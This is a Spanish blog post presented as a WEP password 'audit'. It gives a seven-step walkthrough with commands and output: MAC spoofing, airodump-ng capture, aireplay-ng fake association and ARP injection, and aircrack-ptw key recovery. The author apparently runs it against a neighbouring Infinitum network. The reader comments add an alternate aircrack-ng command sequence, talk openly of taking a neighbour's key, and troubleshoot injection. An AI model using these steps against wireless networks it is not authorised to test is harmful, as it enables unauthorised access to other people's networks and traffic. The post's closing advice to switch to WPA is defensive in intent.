Auditando contraseñas WEP en 7 pasos.

Pues aquí me tienen, una vez que encontré una antena que me funcionara y al ver que había varias redes disponibles no me pude aguantar las ganas de auditar las contraseñas WEP que encontré a mi alrededor.

Hago la aclaración de que esta es una auditoría de seguridad pero les puedo adelantar la conclusión: La configuración por defecto de los accesos inalámbricos de Infinitum es altamente insegura.

Material necesario.

  • Tarjeta de red inalámbrica, en mi caso use la que siempre me ha acompañado en este blog, la multimencionada ENUWI-G2.
  • Una antena, esta es opcional, pero se puede utilizar para mejorar la calidad del enlace, puede ser la EZ-12 o la del escurridor de aluminio que a mi me ha funcionado muy bien.
  • Una distribución de Linux, utilicé wifiway porque fue la que mejor me reconoció mi tarjeta de red inalámbrica, pero existen otras opciones como Wifislax o Bactrack .

Los pasos a seguir.

Hago la aclaración que esta serie de pasos es para wifiway, pero supongo que se pueden aplicar a las otras distros antes mencionadas. También modifique los datos reales, para proteger la identidad de los personajes (siempre quisé escribir eso 😛 ).

Todos estos pasos se ejecutan desde una terminal (terminalofóbicos abstenganse 😉 )

1.- Verificar si se reconoce la tarjeta de red inalámbrica.

iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

Warning: Driver for device wlan0 has been compiled with version 22
of Wireless Extension, while this program supports up to version 20.
Some things may be broken...

wlan0     802.11b/g  Mode:Monitor  Channel=1  Bit Rate=11 Mb/s
          Tx-Power=11 dBm
          Retry:on   Fragment thr:off
          Link Quality=84/100  Signal level=-236 dBm  Noise level=-240 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Como pueden ver si la reconoció, la tarjeta es la wlan0, aunque me lanza una advertencia de que algo puede andar mal, y en efecto, la luz led de la tarjeta no prende, pero eso no evitó que funcionara para este experimento.

2.- Cambio de la mac address.

macchanger -m 00:11:22:33:44:56 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC:   00:11:22:33:44:56 (Cimsys Inc)

Este paso lo realizo para no tener que acordarme de mi Mac Addres 🙂

3.- Búsqueda de las redes inalámbricas en los alrededores.

airodump-ng wlan0
 CH 13 ][ Elapsed: 2 mins ][ 2008-03-16 11:23

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:00:00:00:00:01    2        4        0    0   6  22. WEP  WEP         2WIRE000
 11:11:11:11:11:11   15       53        0    0   1  54. WEP  WEP         INFINITUM0000
 00:00:00:00:00:02    5       34        0    0   6  54. OPN              linksys


En estos resultados vamos a tomar nota de varios datos importantes.

Como pueden ver la red que tiene una mejor calidad de señal es la INFINITUM0000 ya que el valor de PWR myor que el de los demás.

De ahí tomamos el BSSID (11:11:11:11:11:11), el canal en que esta operando (Canal 1) y el ESSID (INFINITUM0000), elegimos esta red porque tiene a mejor calidad de enlace y un método de protección (WEP) muy pobre.

4.- Iniciar la captura.

Iniciando la captura

airodump-ng -w captura -c 1 wlan0

captura es el nombre del archivo que va a recibir la información que vamos a recolectar. Noten también que -c 1 indica que vamos a trabajar en el canal 1.

Es importante que no cerremos esta ventana, de lo contrario lo siguiente que hagamos no servirà de nada. Los siguientes pasos se hacen en una nueva terminal.

5.- Asociar la red inalámbrica.

aireplay-ng -1 0 -e INFINITUM0000 -a 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
11:26:36  Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
11:26:36  Sending Authentication Request
11:26:36  Authentication successful
11:26:36  Sending Association Request
11:26:36  Association successful :-)

Sí aparece el mensaje de Association successful 🙂 estamos listos para continuar. Al principio batallé con este paso, si tienen algún problema es casi seguro que se trata de una mala calidad de señal, pueden estar muy lejos del punto de acceso inalámbrico.

6.- Iniciar la captura de paquetes.

aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
Saving ARP requests in replay_arp-0316-112829.cap
You should also start airodump-ng to capture replies.
Read 598 packets (got 214 ARP requests), sent 1172 packets...(78 pps)

En este punto hay que estar al pendientes, cuando se logren más de 100,000 ARP’s terminamos el proceso (presionando Ctrl+C). Se puede tardar de 10 minutos a media hora dependiendo de la calidad del enlace.

7.- Buscar el archivo .cap con mayor tamaño y encontrar la contraseña.

Llave encontrada

Se acuerdan que en el paso 4 establecimos el nombre del archivo como captura (de hecho puede ser cualquier nombre), bueno pues es normal que en ocasiones se guarde más de un archivo, se distinguen porque les sigue un número, el que debemos de elegir es el que tiene mayor tamaño. Que aquí fue el archivo número 2.

aircrack-ptw captura-02.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 11:11:11:11:11:11  keyindex=0
stats for bssid 11:11:11:11:11:11  keyindex=0 packets=159646
Found key with len 05: 01 23 34 56 78

Y si todo salio bien en menos de 10 segundos obtendremos la contraseña, si en 10 segundos o menos, todo depende de la potencia de nuestro equipo.

Conclusiones.

Con eso es más que suficiente para encontrar la contraseña WEP de un enlace inalámbrico, lamentablemente este tipo de protección es el más utilizado por los Infinitum de Telmex por eso es poco recomendable dejar estos aparatos con su configuración de fábrica, lo mejor es ajustarla a otro tipo de protección como WPA, desconozco si lo 2wire lo permiten pero los linksys permiten restringir el acceso a ciertas Mac address lo que protege aún más una red inalámbrica.

94 thoughts on “Auditando contraseñas WEP en 7 pasos.

  1. asi es .. es lo mesmo en las demas distros… PUES EN HORA BUENA.. todavia me acuerdo de hace mas de 3 años que andaba esnifeando la ciudad.. jeje estaba tan insegura inalambricamente que casi entrabas al baño.. juar juar no se diga de megachafa que scaneas su red y wuala ay dios entras a las compus de los clientes… no se trata de ser paranoicos pero es una super obligacion de todo ingeniebrio perdon ingeniero que proteja su red y si no pa que esta ipcop.. PERO A POCO NO SE SIENTE LA ADRENALINA.. JEJE YA SON VARIOS AÑITOS HACIENDO LA VIOLACION DE ESTOS APARATILLOS DE POCA SEGURIDAD.. QUE SOLO ME QUEDA DECIR… YA DEJEN QUE LA SEÑAL INALAMBRICA SEA HABIERTA PORFAVOR.. YA AY PAISES EN EL MUNDO QUE HACE AÑOS A SU POBLACION ENTREGAN EL INTERNET GRATIS.. LO PEOR NOS VENDEN 4 MEGAS COMO SI FUERA LO ULTIMO DE LO ULTIMO.. CUANDO EL GOBIERNO ESPAÑOL 4 MEGAS ES LO QUE REGALAN EN SUS PLAZAS PUBLICAS.. NO SE DIGA DE JAPON QUE DE 60 MEGAS PASARON A 100.. PERO ESTO AQUI Y POR LO TANTO TE FELICITO POR TU MANUALITO TE ASEGURO QUE LE AHORRASTE MESES A VARIOS QUE ENTREN AQUI..

    PERO RECUERDEN CHAVOS NO SE DEN BAÑO… NO PORQUE YA TIENEN UN ARMA.. LA TENGAN QUE USAR.. Y OTRA NO SEAN CARGADOS CON LOS P2P PORQUE ENTONCES EL VECINO SI VA PENSAR UN POQUITO MAL.. Y TE VERA CON CARA DE WAT. ESTE ES EL INGENIEBRIO QUE ME QUITA MI INTERNET Y VE MI PELICULAS POQUIS QUE TENGO GUARDADAS EN MI DISCO DURO.. JEJE NO SE CREAN PERO CASI CASI..

  2. Felicidades por el articulo Linuxman, te has aventado otro 10.

    Yo andaba en las mismas solo que no he localizado un buen ‘escurridor de aluminio’para mi antena pero gracias a tu artículo ya tengo mi tutorial paso a paso.

  3. Linuxman

    Sin palabras exelente este articulo y tu blog.

    Es la primera que lo visito.. y me parece estupendo ademas encuentro informacion sobre linux que no encuentro en varios foros y paginas.

    Gracias por la informacion de la tarjeta de red encore. y la colocare en marcha.

  4. Justo lo que necesitaba, he encontrado manuales pero ninguno tan claro como el tuyo, espero ahora si poder ver la clave de mi vecino jeje.. ya que con los otros manuales nomas no logro obtener muchos ivs ojala ahora con el wifiway lo pueda conseguir.

  5. use wifiway, lo raro es que en PWR todas me aparecen con -1 pero si tengo cerca las conexiones…trate de entrar otra vez hoy pero no se ve bien wifiway al tratar de entrar y no puedo ajustarle nada del video al tratar de cambiar la resolucion me saca al menu principal :S
    cabe destacar que soy un principiante en esto, pero con ganas 😀

  6. Bueno pues puedes probar wifislax… o , cuando termina de cargar wifiway hay una opcion que dice autox (o algo parecido) para que te configure la pantalla antes de iniciar, si ya lo intentaste prueba sin esa opción

  7. Jorge los dirvers de la broadcom ya vienen parchados en wifislax, quiza te hace falta lanzar el driver desde el menu del wifislax prueba en asistencia chipset luego busca el de tu tarjeta broadcom, creo que desde la version 2 de wifislax vienen ya listos para modo monitor, creo pero no estoy seguro lo que si estoy seguro es que la version 3.1 funciona correctamente con el chipset de broadcom otra cosa si usas wifislax tendras que sustituit aireplay-ng por airplay-broadcom-ng esto porque hwagm compilo asi los drivers para que funcionaran correctamente. Saludos

  8. Muy bueno el artículo Linuxman, pero me quda alguna dudilla que seguro que puedes resolverme. ¿Esto puede hacerse con un ordenador portátil? o necesito un ordenador de sobremesa para poder instalarle una tarjeta configurable en modo captura???
    Mil gracias.
    Un saludo.

  9. Linuxman
    excelente tutorial, pero unas dudas, que version usaste del wifiway y como se hace que la tarjeta usb encore este en modo monitor?, puesto que yo tengo una igualita, saludos

  10. Estoy apunto de lograrlo con una Broadcom con el wifislax 3.1, pero me kedo hasta el paso de inyecciòn, ya que todavia no logro configurar mi tarjeta para que haga inyeccion, he probado con los asistentes para cargar los mòdulos y parace que no funcionan con mi tarjeta, eh probrado el aireplay-broadcom-ng y nada.

  11. Parece que no logre inyectar , ni con la broadcom ni con la ENUWI-G2 USB, pero parace que ya encontre la solución, probablemente fue el excaso trafico que habia aqui en mi casa, según la documentación oficial dice lo siguiente: “Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.”

    Probablemente ese sea mi fallo, o tu que piensas?

  12. excelente Tuto… Pero tengo problemas al momento de asociarme a al router. Me indica Unsuccesful..! :-(, Mi terjeta es la integrada de ina Compaq, creo es Broadcom..! Pudieran ayudarme… Gracias!!

  13. Fabian: cambia un mac adress por una que puedas recordar facilmente:

    Linuxman: ya probé con wifiway y es el mismo resultado, a la hora de inyectar, no me aparecen los arp, se queda sin hacer nada, esto con la wifislax y wifiway, que por cierto las 2 distros me las detecta bien la Enuwi-g2.

    Otra cosa , cuando hiciste estos pasos con la INFINITUM0000, habia trafico en esa red?, es decir, habian personas conectadas trabajando normalmente ?

  14. Lo que ven es lo que uso y lo que me funcionó…
    Fabian, Antonio:
    ¿Que tan lejos están del punto de acceso?, yo uso la antena del escurridor de aluminio para mejorar la calidad del enlace… Ustedes ¿Que usan?

  15. Ya logre sacar la clave wep, lo hice con la tarjeta inalámbrica Enuwi-g2, wifiway en una Desktop. Hice los mismos pasos de este tutorial y la logró sacar a la perfección.

    Solo que tengo una duda muy grande, con la misma distro wifiway, con la misma tarjeta inalámbrica, pero con mi laptop dell inspiron 1521 no logro hacer la inyección, continua ese problema en mi laptop, que podra ser?

  16. Linuxman: Ya “correjí” mi problema, virtualicé wifiway en mi Debian y utilice la Inalámbrica enuwi =), me quedó la duda del porqué no inyecta tráfico de manera normal, tuve que virtualizarlo para que me detectara un hardaware genérico y así usar la usb sin problemas.

  17. HOLA QUE TAL MI PREGUNTA ES QUE REQUIRIMINETO MINIMO DE PROCESADOR DEBO TENER PARA PODER DESENCRIPTAR LAS CLAVES CON AIRCRACK CON MAYOR RAPIDES. YO TENGO UNA IBM THINKPAD T22 A 900MHZ CON RAM 384MB.

  18. No creo que sea problema Cesar, yo lo he hecho en Celerons con 256 MB en ram y lo hace en 5 segundos, tu preocupate por tener una buena muestra, lo demás es muy sencillo.

    Pero recuerda que el proposito de este post es demostrar lo sencillo que es brincarse una encripción wep.

  19. hola liniuxman e siguido todos los pasos que decribes.tengo el mismo hardware y ya en el ultimo con aircrack tarda demasiado en encontrar mi clave wep e dejado toda la noche encendida mi compu pero no encuentra nada.¿que estare haciendo mal??

  20. Juan Carlos: Si usaste aircrack-ptw (no aricrack) debe ser muy rápido. Ahora yo tuve un problema muy similar con aircrack-ptw y era debido a que la muestra no era muy buena,¿Estás muy lejos del punto de acceso?, ¿Cuanto tiempo tardas en obtener la muestra?

  21. hola linuxman antes que nada gracias por responder.ya encontre mi clave (WEP)es increible como se decifran estas claves y mejor la voy cambiar (WPA 2)ya que el costo de tener el servicio es muy caro bueno eso es todo.GRACIAS…..

  22. hola linuxman antes que nada gracias por responder.ya encontre mi clave (WEP)es increible como se decifran estas claves y mejor la voy cambiar (WPA 2)ya que el costo de tener el servicio es muy caro bueno eso es todo.GRACIAS…..

  23. hola linuxman antes que nada gracias por responder.ya encontre mi clave (WEP)es increible como se decifran estas claves y mejor la voy cambiar (WPA 2)ya que el costo de tener el servicio es muy caro bueno eso es todo.GRACIAS…..

  24. Hola linux man tu manual es muy bueno lo explica todo detalladamente pero me atoré y quería ver si me podrías ayudar:
    en el 1er paso al escribir iwconfig me aparece lo sig.:

    lo no wireless extensions
    eth0 no wireless extensions
    eth1 no wireless extensions

    Warning:Driverfor device eth2 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20.
    Some things may be broken…

    eth2 IEE 802.11b/g ESSID:off/any Nickname:”Broadcom 4311″
    Mode:MAnaged Acces Point:invalid
    RTS thr:off Fragment thr:off
    Encryption key:off
    Link Quality=0/100 Signal level=-256dBm Noise level=-256 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    Por lo que en el segundo paso cambié de “airodump-ng wlan0” a “airodump-ng eth2”
    pero no me aparece ninguna red a pesar de que estoy cerca de alguna.
    ¿que puedo hacer?
    agradecería que me contestara
    un saludo

  25. hola, yo tengo una tarjeta realtek rtl8187b wireless 802.11g 54mbps usb 2.0 network adapter y no me la ha reconocido el wifiway, que puedo hacer. (pc con windows xp) doy iwconfig y aparece:
    lo no wireless extensions.

    eth0 no wireless extensions.

    gracias

  26. hola, Yo mismo me respondo: lo que paso es que yo compre una tarjeta encore del mismo modelo pero ya es una blanca (nuevo modelo), la cual no sirve con ningun cd linux, de milagro encontre la que dice linuxman una plateda (por cierto muy dicil de encontar aqui en la cd. de mexico), con esa obtuve la clave wep de mi infinutum en 10 minutos sin ningun contratiempo.

    Gracias linuxman por ese sencillo tutorial. Marco

  27. hola linuxman
    ya intenté con los comandos normales y al momento de poner “airodump-ng wlan0” me aparece “wlan0 is not network interface” y al poner ya sea “airodump-ng eth2” no aparecen las señales. Y esta prendido el interruptor de la tarjeta.

    ¿que puedo hacer?
    gracias

  28. hola linuxman:
    logré conseguir la tarjeta que tu mencionas (ENUWI-G2), pero es de color blanca no gris, y tengo un problema no me detecta la tarjeta,¿que puedo hacer?, agradecería tu respuesta ya que soy nuevo en esto y estoy muy interesado.
    saludos

  29. Ya me habian comentado de esta nueva versión de la enuwi-g2, nada más espero que no hayan cambiado el chipset… tendría que conseguir una de estas.. alguien puede pegar aqui el archivo readme del driver de linux, el que viene en el cd.

  30. HOla Linuxman, intente con una laptop hp con tarjeta IPW3945, todo parecía funcionar bien con el wifislax 3.1 pero al intentar asociar la tarjeta con el AP solo veo que envia:

    Sending Authentication Request

    y despues de eso la maquina se congela, alguna sugerencia de que puede estar pasando?

  31. Muy buen articulo, que pasa si el nombre de clave es distinto a los de prodigy, por ejemplo 2 palabras, con espacio intermedio, al intentar la asociación no reconoce este tipo de sintaxis, hay que poner algo enmedio de las palabras? ejemplo:

    nombre de red regular prodigy3452
    nombre que no reconoce: red manuel

  32. hola linuxman yo adquiri la tarjeta enuwi -g2 RTL8187B y tengo el mismo problema que DELOX el wifiway no me reconoce la tarjeta cualqier ayuda la agradeceria

  33. hola, estoy haciendo los pasos que indicas, pero no me reconoce la tarjeta de red, me dice q no hat¿y ningun dispositivo y es una como la que indicas, faltara el driver para linux?

  34. Aprendiz: ¿Qué tarjeta de red estas usando?, si no te aparece ninguna al teclear iwconfig probablemente es porque tu tarjeta de red no fue reconocida.

    Saludos.

  35. Hola linuxman, te mando un correo, necesito saber si podemos contactar al posteador numero

    # 43 | marco
    July 31, 2008 @ 6:06 pm

    por medio de tu admin status, plis mandarle un correo para ver donde compro su Encore en el DF, yo soy de estos lugares y la he buscado sin hallar, la venden en ML, pero me saldria $80 mas de envio

    Saludos y gracias de antemano

  36. Hola, soy el posteador #43, ibizurf la tarjeta esta muy escasa te recomiendo que mejor compres una Linksys USB modelo WUSB54GC, esa la probe y funciono perfectamente con este tutorial. la tarjeta la puedes conseguir en la plaza de la computacion por el metro salto del agua. la encore ya no hay, despues de que compre la que tengo actualmente fui por otra y ya no habia, la linksys funciona perfectamente pero es algo cara (350-400 pesos) en promedio buscala en el piso de arriba es mas barata. saludos y espero te ayude. Marco

    Cuidado con las que venden en mercado libre, tienen las imagenes de la tarjeta encore plateada pero te mandan la blanca que no funciona con ninguno de los discos de linux. Si este comentario no es apropiado en este lugar pido linuxman que lo borres. Saludos desde la ciudad de la esperanza jajaja.

  37. gracias marco, la buscarè pero si se me hace carona, me darè una vuelta en la plaza
    el cuate de ML, tiene varias y calificaciones positivas es de veracruz,
    ahhh como extraño mis 2200bg
    gracias y saludos a linuxman

  38. Alguien me puede ayudar a saber qué tarjetas puedo usar para auditar, si mi lap tiene un procesador core 2 duo T5250? se los agradecería mucho.

  39. Hola linuxman

    Necesito de tu ayuda ya que soy nuevo en el mundo linux.

    Mi problema, para empezar tengo la enuwi-g2 es una cosa blanca y de forma rectangular algo tosca, a la hora de darle iwcongig me sale esto…..

    # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    wmaster0 no wireless extensions.

    wlan0 IEEE 802.11bg ESSID:””
    Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
    Tx-Power=27 dBm
    Retry min limit:7 RTS thr:off Fragment thr=2352 B
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    pan0 no wireless extensions.

    mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
    Retry min limit:7 RTS thr:off Fragment thr=2352 B
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    mon1 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
    Retry min limit:7 RTS thr:off Fragment thr=2352 B
    Encryption key:off
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:0 Missed beacon:0

    Si no me equivoco ya fue reconosida ¿O NO?

    y al darle el cambio de mac me sale lo siguiente….

    # macchanger -m 00:11:22:33:44:56 wlan0
    Current MAC: xx:xx:xx:xx:xx:xx (unknown)
    ERROR: Can’t change MAC: interface up or not permission: Device or resource busy

    Como soy nuevo en esto no se si primero hay que cambiar el #mac para poder continuar

    Porque intente saltarme ese paso pero igual tengo problemas sale lo sig:

    # airodump-ng wlan0
    ioctl(SIOCSIWMODE) failed: Device or resource busy

    ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run ‘airmon-ng start wlan0 ‘
    Sysfs injection support was not found either.

    e hice el airmon-ng start wlan0 …

    # airmon-ng start wlan0

    Interface Chipset Driver

    wlan0 Realtek 8187L rtl8187 – [phy0]
    (monitor mode enabled on mon1)
    mon0 Realtek 8187L rtl8187 – [phy0]

    necesito de tu ayuda por favor ya estoy desesperado

    Haaa por cierto no se si tenga que ver pero lo estoy intentando con ubuntu 8.10

    !!!GRACIAS por su atencion¡¡¡

  40. Hola de nuevo
    uppsss perdon por hacer mi comentario anterior demasiado largo…
    ademas no sabia que el simbolo (#) marcaba demasiado las letras

    Lo siento

  41. Laaaaaaastimaaaaaa Sunday, la enuwi de color blanco y de forma rectangular no funciona para este experimento. Tiene que ser la de color gris.

    En los comentarios recomiendan una linksys que también funciona.. 😀 Saludos !!!

  42. tengo un adaptado tb con el REALTEK 8187L y lo primero que debes escribir es airmon-ng start wlan0, que es el ultimo paso que haces….. prueba despues todos los demas pasos.

    he usado, wifislax 3.1 y wifi-way 1.0

  43. Teóricamente es posible Anais, pero es mucho más complicado. El tamaño de la muestra es mucho más grande y los programas son diferentes.

    Nunca lo he intentado.

  44. Favor de auxiliarme, al ejecutar la ultima sentencia
    aircrack-ptw captura-02.cap
    No se obtiene nada y ya llevo mucho intentos, me dice:
    No se ha encontrado una clave, desea continuar con aircrack-g S,n
    Le selecciono S y escojo de una lista la red y tampoco.
    Que puedo hacer ?

  45. Antes de ejecutar la sentencia :
    aircrack-ptw captura-02.cap
    Hay que cerrar las consolas que se tiene abiertas y terminar con Ctrl+C las sentencia que estan corriendo ?? Por ej: el airodump y airplay

    Es cierto que si el archivo CAPTURA esta en /root no funciona ? Donde se debe ejecutar el comando que lo genera ?

    Gracias

  46. Igual el mismo problema que los anteriores, no puedo hayar los archivos “captura”, dónde puedo ubicarlos? Aclaro, soy bastante novato en linux. Gracias

  47. ke tal linuxman, mira yo tengo mi laptop con una ipw3945 integrada y pues bueno, hice una antena con una tarjeta de red ENUWI-G2 en Wifiway, bueno… primero que nada no logro echar andar el ENUWI, lo detecta y todo al hacer iwconfig pero al hacer airodump-ng wlan1 (asi es como lo detecta el iwconfig) no me detecta ninguna red inalambrica… a que se puede deber esto?..

  48. hola linuxman quiro comprar una laptop cual me recomiendas que pueda usar con back track me venden una acer pentium2core me servira y acerca de las notbock con sistema operativo linux limpus soportan back track te agradesco tu tiempo

  49. que tal linuxman.
    el wifiway no me detecta mi tarjeta(enuwi-g2 usb)
    como puedi hacer para que me la detecte, llevo mucho tiempo y no pudeo podrian ayudarme

  50. Que onda!

    Buen tutorial !, va mi caso..

    Tengo una wirelles:Intel 3945ABG y OS:wifislax 3.1 y se congela mi portatil al ejecutar el “aireplay -1”, la he visto varias veces caer en coma sin hacerla reaccionar.

    Antes de ello, cuando ejecuto el script para levantar mi wireless me crea dos interfaces la “wifi0” y “rtap0” por ahi va la el problema?

    Saludos.

  51. Que onda !

    Pos ya adelante ese problema, el dump lo apunte al rtap0 y el replay lo apunte a la wifi, ya con esto no se trabo la compu.

    Saludos

  52. amigos, tengo un notebook con una tarjeta de red Realtek RTL8187B Wireless 802.11bg 54Mbps USB 2.0 Network Adapter

    He descargado el wifislax 3.1 y el wifiway 1 final, de ambos me he hecho el live CD

    y al momento de bootear desde cl CD y utilizar cualquiera de estos 2 softwares, ambos no me reconocen la tarjeta de red…

    necesito la ayuda de alguien porfavor…

    mi mail es mauriciorh90@gmail.com

    Muchas gracias ante cualquier ayuda!!

  53. AMIGO Y QUE PASA SI ME APARESE ESTO COMO PUEDO ENCONTAR LA CLEVE DE LA DIRECCION stats for bssid 00:22:A4:60:97:B9 keyindex=0 packets=12723

    wifiway ~ # aircrack-ptw archivo-01.cap
    This is aircrack-ptw 1.0.0
    For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
    allocating a new table
    bssid = 00:22:A4:60:97:B9 keyindex=0
    allocating a new table
    bssid = 00:1D:5A:22:AE:E1 keyindex=0
    allocating a new table
    bssid = 00:1F:9F:DE:7E:7E keyindex=0
    allocating a new table
    bssid = 00:24:17:82:5B:95 keyindex=0
    allocating a new table
    bssid = 00:25:68:C3:75:EE keyindex=0
    allocating a new table
    bssid = 00:18:D2:00:81:B0 keyindex=0
    stats for bssid 00:22:A4:60:97:B9 keyindex=0 packets=12723
    stats for bssid 00:1D:5A:22:AE:E1 keyindex=0 packets=1
    stats for bssid 00:1F:9F:DE:7E:7E keyindex=0 packets=2
    stats for bssid 00:24:17:82:5B:95 keyindex=0 packets=2
    stats for bssid 00:25:68:C3:75:EE keyindex=0 packets=1
    stats for bssid 00:18:D2:00:81:B0 keyindex=0 packets=5
    wifiway ~ #

  54. hola linux man..muy bueno el post, pero tienes idea si mi tarjeta soporta todo los programas necesarios o tendre que comprar otra?
    mi tarjeta es un Realtek RTL8187B Wireless 802.11bg 54Mbps USB 2.0 Network Adapter
    muchas gracias

  55. buenas que pasa cuando te ecnutras un AP y donde dice MB solo te indica 54 sin el punto que significa el punto ya que cuando inyecto paquetes solo cuenta el de Read packets
    Saludos

  56. hola a todos, muy buen tutorial para auditar redes, de veras que esta bueno! yo hace tiempo ya que “audito” redes inalambricas y normalmente lo hago con aircrack-ng que instalo a mi linux de turno (ahora con sabayon 5.2). Para quienes consultan por el modelo de la tarjeta a usar, les diré que no siempre tiene que ver la marca de la tarjeta, sino el chipset que tiene incorporado. Esto realmente es un dolor de cabeza puesto que no siempre la misma marca de tarjeta o adaptador tiene el mismo chipset. Como experiencia personal puedo decir que las tarjetas y adaptadores que vienen con Chipset Zydas, Atheros y RaLink funcionan de maravilla. Actualmente tengo una d-link DWA-510 en mi Desktop y estoy conectado sin problemas. Traten de averiguar por el chipset mas que el modelo de la tarjeta y de seguro que dan con lo que necesitan, Saludos desde Chile

  57. Linuxman, una consulta, has podido “auditar” redes wifi con cifrado wpa/tkip o wpa2? si es asi como lo hiciste? será usando un diccionario o tabla rainbow??

  58. Ali, no tiene nada que ver eso. como experiencia personal te dire que lo que debe interesarte es si hay trafico en la red para poder capturar las IVs necesarias para la desencriptacion. Eso lo ves bajo la columna DATA que es la que indica la cantidad de transferencia de datos en la red. Para explicarlo un poco, las conexiones cifradas con wep, constantemente envian paquetes de datos hacia la red conectada para verificar que aun esté validado en él, es por esa razon que podemos realizar captura de paquetes de datos y la razon de la debilidad del cifrado WEP. Por otra parte, el Cifrado WPA solo envía un paquete de datos con la contraseña al iniciar la conexion, llamado Handshake, por lo cual es teoricamente casi imposible desencriptar la clave de red sin un buen diccionario de datos, que contenga millones de posibles conbinaciones de claves para encontrar la que sea valida. Otra forma de encontrar claves wep usando aircrack-ng en vez de aircrack-ng seria:
    – paso 1: poner la tarjeta en modo monitor airmon-ng start [interfase de red(normalmente wlan0)]

    – Paso 2: escanear las redes airodump-ng [interfase de red]
    y seleccionar la red que vamos a “auditar” es importante tomar nota de la direccion MAC y del canal que ocupa indicado bajo la columna CH

    – Paso 3: fijar la red que vamos a auditar airodump-ng -c [canal] –bssid [direccion mac] -w [archivo donde guardaremos las capturas] [interfase de red]

    hecho esto, abrimos una nueva terminal y realizamos la asociacion con la red que queremos auditar
    – Paso 4: en la nueva terminal tecleamos aireplay-ng –fakeauth 0 -e [nombre de la red] -a [direccion mac de la red] [interfase de red] si te da error prueba con aireplay-ng –fakeauth 600 -o 1 -q 10 -e [nombre de la red] -a [direccion mac] [interfase de red]
    Hecho esto, en la misma terminal hacemo lo que indica el paso 5.

    – Paso 5: tecleamos aireplay-ng -3 -b [direccion mac] [interfase de red] -x 250 y si te vas a la primera terminal donde fijamos la red a auditar, ya debes empezar a notar que estas inyectando trafico cuando la columna DATA comienza a aumentar rapidamente. Normalmente juntando unas 40.000 IVs (en la columna DATA es suficiente. llegando a esa cantidad presiona CRTL-C para dejar de capturar IVs

    – Paso 6 y final: obtenemos la clave de red ejecutando: aircrack-ng -z -b [direccion mac] [nombre del archivo que utilizaron para la captura-01.cap] y ya tienen su clave de red.

    Esta es la manera en la que yo obtengo mis claves de red usando aircrack-ng en cualquier linux. Obviamente debo instalarlo primero, y pues por eso existen estas Distros especializadas para ello como WifiSlax, WifiWay, Backtrack, Russix etc.

    Saludos a todos y espero que les sea de utilidad

  59. Hola, antes de usar wifislax 3.1 mi antena usb “Realtek RTL8187B Wireless 802.11bg 54Mbps USB 2.0 Network Adapter” funcionaba, después de que usé una sola vez el wifislax ahora la antena no se activa, no responde ¿cómo puedo solucionar esto?

  60. Porque no puedo reunir DATAS si estoy muy cerca de la terminal que quiero Crakear? tengo mucha PWr y sin embargo no logro reunir DATAS.Saludos

¡Me encantaría saber que opinas!

%d bloggers like this: